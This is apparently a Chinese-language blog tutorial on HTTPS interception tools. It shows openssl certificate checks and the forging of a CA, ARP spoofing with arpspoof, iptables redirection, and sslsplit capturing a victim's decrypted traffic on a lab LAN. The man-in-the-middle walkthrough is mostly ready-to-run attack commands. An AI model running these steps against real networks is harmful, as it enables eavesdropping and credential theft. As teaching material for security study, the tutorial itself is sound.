https攻击工具详解（arp欺骗、中间人攻击）（openssl+sslscan+sslsplit ）

https攻击（openssl+sslscan+SSLsolit）

openssl
openssl伪造证书
sslscan、sysctl、arpspoof 中间人攻击、arp欺骗工具
arp欺骗过程
sslscan

openssl

**
识别ssl的签发单位、证书信息等
可以伪造证书

openssl 直接调用openssl库识别目标服务器支持的SSL/TLS（传输层安全）
-openssl s_client www.taobao.com:443

上图的GlobalSign Organization Validation CA是SSL协议证书的颁发公司
openssl s_client -connect 查看证书信息
openssl s_client -connect www.taobao.com:443
openssl s_client -tlsl_2 -cipher “NULL,EXPORT,LOW,DES” 协商低安全级别cipher suite服务器不响应必须有四到五种加密组合才能构成SSL
openssl s_client -tlsl_2 -cipher "NULL,EXPORT,LOW,DES" www.baidu.com:443
openssl ciphers -v "NULL,EXPORT,LOW,DES" 列出已知不安全ciper（加密组合套件）组合

openssl伪造证书

第一步先生成私钥（注意生成的位置）
openssl genrsa -out ca.key 2048

2048是长度大多数证书长度都是2048

第二部生成证书（注意生成的位置）
openssl req -new -x509 -days 1096 -key ca.key -out ca.crt

new是新生成的 509是标准 days是有效时间 key是用那个私钥生成 crt是证书格式

最后下面按照提示填写国家CN 省Shangxi 城市Taiyuan 组织名称组织单位名字常用的FQDN名称邮箱地址

sslscan、sysctl、arpspoof 中间人攻击、arp欺骗工具

先解释一下什么是arp欺骗，也就是中间人攻击

首先以太网当中，网络设备之间互相通信用的是mac而不是IP地址 ARP协议就是将IP地址转换成MAC地址的，RARP正好相反。
假设A(192.168.1.2)与B(192.168.1.3)在同一局域网，A要和B实现通信。A首先会发送一个数据包广播到局域网广播地址192.168.1.255（假设），该数据包内包含了源IP（A）、源MAC、目的IP（B）、目的MAC，这个数据包会被发放给局域网中所有的主机，但只有B主机会回复一个包含了源IP（B）、源MAC、目的IP（A）、目的MAC的数据包给A，同时A主机会将返回的这个地址保存在ARP缓存表中。
在ARP缓存表机制存在一个缺陷，就是当请求主机收到ARP应答包后，不会去验证自己是否向对方主机发送过ARP请求包，就直接把这个返回包中的IP地址与MAC地址的对应关系保存进ARP缓存表中，如果原有相同IP对应关系，则原有的会被替换。
双向欺骗，就是双方都骗一次，单向就是只骗一个
用arp -a可以查看arp缓存表

arp欺骗过程

伪造服务器首先要伪造证书

启动功能sysctl -w net.ipv4.ip_forward=1
清空iptables表内信息iptables -t nat -F
列出iptables表内信息，查看是否为空iptables -t nat -L,不为空则进行第二部清空
确认端口80和443是否被占用netstat -pantu | grep :80 netstat -pantu | grep :443 如果没有回显则表示没有被占用
开始写iptables规则iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080

-t 使用哪张表
PREROUTING 在路由之前就生效
-p tcp 使用tcp协议
80 REDIRECT 8080将80端口的流量重定向给8080

写iptables规则iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
查看iptables表iptables -t nat -L信息
arp欺骗开始arpspoof -i eth0 -t 192.168.72.8 -r 192.168.72.2 -i是网卡，-t是被欺骗的IP，-r是服务器的地址
查被欺骗主机的arp表，发现mac地址已经改变
记录被欺骗主机请求信息sslsplit -D -l 1.log -j /root/Desktop/test/ -S /root/Desktop/test/aaa -k /root/Desktop/ca.key -c /root/Desktop/ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

-D 查看debug信息
-l 连接请求过程记录到某个文件
-S请求详细过程记录到某个文件
-k 密钥
-c 证书
ssl 指向8443
tcp指向8080
0.0.0.0谁都可以访问

现在打开被劫持主机，浏览百度，发现显示不是安全的连接，文件内存在了信息，证明劫持成功
如果在这个时候，将最早生成的证书导入到被挟持主机上，则不会报错
报错的原因、、、、

sslscan

自动识别SSL配置错误、过期协议、过时cipher suite（加密组合套件）和hash算法
默认会检查CRIME、heartblleed漏洞（后者心脏出血漏洞错误原因：缓冲区过读，即可以读取的数据比英国允许读取的还多）
绿色表示安全，红色黄色需要引起注意

sslscan url 跟下面加参数是一样的结果

-tlsall
sslscan -tlsall www.taobao.com:443
检测TSL有没有漏洞
支持的cipher suite（加密组合套件）算法
DNS解析记录

https攻击工具详解（arp欺骗、中间人攻击）（openssl+sslscan+sslsplit ）相关推荐

ARP协议工作原理及ARP欺骗(中间人攻击)
网络中的数据传输所依赖的是MAC地址而不是IP地址,ARP协议负责将IP地址转换为MAC地址 ARP协议工作原理 ARP协议规定,每台计算机都需要一个ARP表,用来保存IP地址和MAC地址的映射关系 ...
详解ARP协议（简介、主要功能、通信原理、ARP欺骗）
详解ARP( Address Resolution Protocol, 地址解析协议) 1. 简介 ARP,即地址解析协议,根据IP地址获取MAC地址的一个TCP/IP协议. arp协议 arp请 ...
DoS及攻击方法详解
DoS及攻击方法详解 0x01 DOS攻击简介 DoS(Denial of Service) DoS又被称为拒绝服务,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务,最 ...
centos rpm 安装 perl_XtraBackup工具详解 Part 2 xtrabackup安装
实验环境此次实验的环境如下 MySQL 5.7.25 Redhat 6.10 1. xtrabackup版本我们在官方网站可以看到xtrabackup有多个版本 https://www.perco ...
Chrome开发者工具详解(4)-Profiles面板
Chrome开发者工具详解(4)-Profiles面板如果上篇中的Timeline面板所提供的信息不能满足你的要求,你可以使用Profiles面板,利用这个面板你可以追踪网页程序的内存泄漏问题,进一 ...
Java定时任务调度工具详解之Timer篇
Java定时任务调度工具详解之Timer篇 https://segmentfault.com/a/1190000009542398
python数值转换机_用于ETL的Python数据转换工具详解
ETL的考虑做数据仓库系统,ETL是关键的一环.说大了,ETL是数据整合解决方案,说小了,就是倒数据的工具.回忆一下工作这么些年来,处理数据迁移.转换的工作倒还真的不少.但是那些工作基本上是一次 ...
HTTPS 加密算法原理详解
本文讲的是HTTPS 加密算法原理详解, 前言 HTTPS(全称:HyperText Transfer Protocol over Secure Socket Layer),其实 HTTPS 并不是一 ...
Java定时任务工具详解之Timer篇
Java定时任务调度工具详解什么是定时任务调度? ◆ 基于给定的时间点,给定的时间间隔或者给定的执行次数自动执行的任务. 在Java中的定时调度工具? ◆ Timer ◆Quartz Timer和Q ...